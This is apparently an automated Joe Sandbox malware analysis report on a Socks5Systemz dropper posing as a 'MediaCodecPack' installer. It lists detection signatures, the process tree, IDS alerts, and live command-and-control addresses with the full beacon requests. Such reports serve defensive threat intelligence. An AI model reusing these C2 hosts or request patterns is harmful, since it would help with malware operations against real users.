Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
newwork.exe.1.exe

Overview

General Information

Sample name:newwork.exe.1.exe
Analysis ID:1577462
MD5:27b4fa67c0810bc212077971a00854ea
SHA1:39d4dbe69f339c608a3f9ecf7f718c25e1c0dfbb
SHA256:2fc18ce155e0b723ffe70b0ed7fa5ff85a03b50d90367e8a1c5591e88af2089e
Tags:bulletproofexeSocks5Systemzuser-abus3reports
Infos:

Detection

Socks5Systemz
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • newwork.exe.1.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\newwork.exe.1.exe" MD5: 27B4FA67C0810BC212077971A00854EA)
    • newwork.exe.1.tmp (PID: 7128 cmdline: "C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmp" /SL5="$1041E,3065697,56832,C:\Users\user\Desktop\newwork.exe.1.exe" MD5: ED6A19AD054AD0172201AF725324781B)
      • mediacodecpack.exe (PID: 6172 cmdline: "C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exe" -i MD5: 49FC2D4BA26F2EEF94CCC6B71EB0AD96)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\is-F43ND.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000002.00000002.3557079797.0000000002B40000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          00000002.00000002.3556411749.0000000000B01000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
            00000001.00000002.3557131784.00000000058E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000002.00000000.1708594819.0000000000401000.00000020.00000001.01000000.00000009.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Process Memory Space: mediacodecpack.exe PID: 6172JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  SourceRuleDescriptionAuthorStrings
                  2.0.mediacodecpack.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T13:59:10.577867+010020287653Unknown Traffic192.168.2.449887188.119.66.185443TCP
                    2024-12-18T13:59:16.363973+010020287653Unknown Traffic192.168.2.449904188.119.66.185443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-18T13:59:11.506476+010028032742Potentially Bad Traffic192.168.2.449887188.119.66.185443TCP
                    2024-12-18T13:59:17.056119+010028032742Potentially Bad Traffic192.168.2.449904188.119.66.185443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5bAvira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388aAvira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4Avira URL Cloud: Label: malware
                    Source: newwork.exe.1.exeReversingLabs: Detection: 15%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Source: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045D188
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0045D254 ArcFourCrypt,1_2_0045D254
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0045D23C ArcFourCrypt,1_2_0045D23C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeUnpacked PE file: 2.2.mediacodecpack.exe.400000.0.unpack
                    Source: newwork.exe.1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1Jump to behavior
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49887 version: TLS 1.2
                    Source: Binary string: msvcp71.pdbx# source: is-NF7R8.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-R0E3S.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-NF7R8.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-2R56A.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-R0E3S.tmp.1.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
                    Source: global trafficTCP traffic: 192.168.2.4:49896 -> 46.8.225.74:2024
                    Source: Joe Sandbox ViewIP Address: 46.8.225.74 46.8.225.74
                    Source: Joe Sandbox ViewIP Address: 188.119.66.185 188.119.66.185
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49887 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.4:49904 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49904 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49887 -> 188.119.66.185:443
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5b HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: unknownTCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B02B95 WSASetLastError,WSARecv,WSASetLastError,select,2_2_00B02B95
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e30088883250aa15d105633775b0e650f0ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fd5388a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4ce718c34f7f632ff3b70caaf94cda9ca6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad7358ed2d49c5b HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: newwork.exe.1.tmp, 00000001.00000002.3557131784.00000000059AC000.00000004.00001000.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000000.1708971445.00000000004D2000.00000002.00000001.01000000.00000009.sdmp, MediaCodecPack.exe.2.dr, mediacodecpack.exe.1.dr, is-F43ND.tmp.1.drString found in binary or memory: http://wonderwork.ucoz.com/
                    Source: newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                    Source: newwork.exe.1.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: newwork.exe.1.exeString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: newwork.exe.1.exe, 00000000.00000003.1696785947.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696594299.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: newwork.exe.1.exe, 00000000.00000003.1696785947.00000000020A8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696594299.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000000.1697239385.0000000000401000.00000020.00000001.01000000.00000004.sdmp, newwork.exe.1.tmp.0.dr, is-F7SVI.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                    Source: mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/
                    Source: mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/04
                    Source: mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/405117-2476756634-1002W=
                    Source: mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b82a8dcd6c946851e3008888325
                    Source: mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmp, mediacodecpack.exe, 00000002.00000002.3555972784.000000000092E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/ai/?key=8f3f2b3ab14e166f251de6a5231e72eee7c4db7e40b92a8dcd6c946941bb46829e7c4
                    Source: mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/allowedCert_OS_1
                    Source: mediacodecpack.exe, 00000002.00000002.3555972784.000000000090F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/priseCertificates
                    Source: mediacodecpack.exe, 00000002.00000002.3557521142.0000000003364000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://188.119.66.185/rosoft
                    Source: newwork.exe.1.exe, 00000000.00000003.1696268555.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000002.3556231844.00000000020A1000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.exe, 00000000.00000003.1696174472.0000000002310000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1698014219.0000000003100000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.3556862399.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000003.1698150930.00000000021B8000.00000004.00001000.00020000.00000000.sdmp, newwork.exe.1.tmp, 00000001.00000002.3556348257.0000000000619000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.4:49887 version: TLS 1.2
                    Source: is-2R56A.tmp.1.drBinary or memory string: DirectDrawCreateExmemstr_998bbfeb-d
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0042F520 NtdllDefWindowProc_A,1_2_0042F520
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00423B84 NtdllDefWindowProc_A,1_2_00423B84
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004125D8 NtdllDefWindowProc_A,1_2_004125D8
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00478AC0 NtdllDefWindowProc_A,1_2_00478AC0
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,1_2_00457594
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,1_2_0042E934
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,0_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,1_2_004555E4
                    Source: C:\Users\user\Desktop\newwork.exe.1.exeCode function: 0_2_0040840C0_2_0040840C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004706A81_2_004706A8
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004809F71_2_004809F7
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004352C81_2_004352C8
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004673A41_2_004673A4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0043DD501_2_0043DD50
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0043035C1_2_0043035C
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004444C81_2_004444C8
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004345C41_2_004345C4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00444A701_2_00444A70
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00486BD01_2_00486BD0
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00430EE81_2_00430EE8
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0045F0C41_2_0045F0C4
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004451681_2_00445168
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0045B1741_2_0045B174
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004694041_2_00469404
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004455741_2_00445574
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_004519BC1_2_004519BC
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_00487B301_2_00487B30
                    Source: C:\Users\user\AppData\Local\Temp\is-KUNT4.tmp\newwork.exe.1.tmpCode function: 1_2_0048DF541_2_0048DF54
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_004010002_2_00401000
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_004067B72_2_004067B7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609660FA2_2_609660FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6092114F2_2_6092114F
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6091F2C92_2_6091F2C9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096923E2_2_6096923E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6093323D2_2_6093323D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6095C3142_2_6095C314
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609503122_2_60950312
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094D33B2_2_6094D33B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6093B3682_2_6093B368
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096748C2_2_6096748C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6093F42E2_2_6093F42E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609544702_2_60954470
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609615FA2_2_609615FA
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096A5EE2_2_6096A5EE
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096D6A42_2_6096D6A4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609606A82_2_609606A8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609326542_2_60932654
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609556652_2_60955665
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094B7DB2_2_6094B7DB
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6092F74D2_2_6092F74D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609648072_2_60964807
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094E9BC2_2_6094E9BC
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_609379292_2_60937929
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6093FAD62_2_6093FAD6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6096DAE82_2_6096DAE8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_6094DA3A2_2_6094DA3A
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60936B272_2_60936B27
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60954CF62_2_60954CF6
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60950C6B2_2_60950C6B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60966DF12_2_60966DF1
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60963D352_2_60963D35
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60909E9C2_2_60909E9C
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60951E862_2_60951E86
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60912E0B2_2_60912E0B
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_60954FF82_2_60954FF8
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B170C02_2_00B170C0
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B0E07E2_2_00B0E07E
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B1BAFD2_2_00B1BAFD
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B1D32F2_2_00B1D32F
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B20DB42_2_00B20DB4
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B1B6092_2_00B1B609
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B2267D2_2_00B2267D
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B1BF152_2_00B1BF15
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.0.11\mediacodecpack.exeCode function: 2_2_00B1874A2_2_00B1874A
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\MediaCodecPack\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
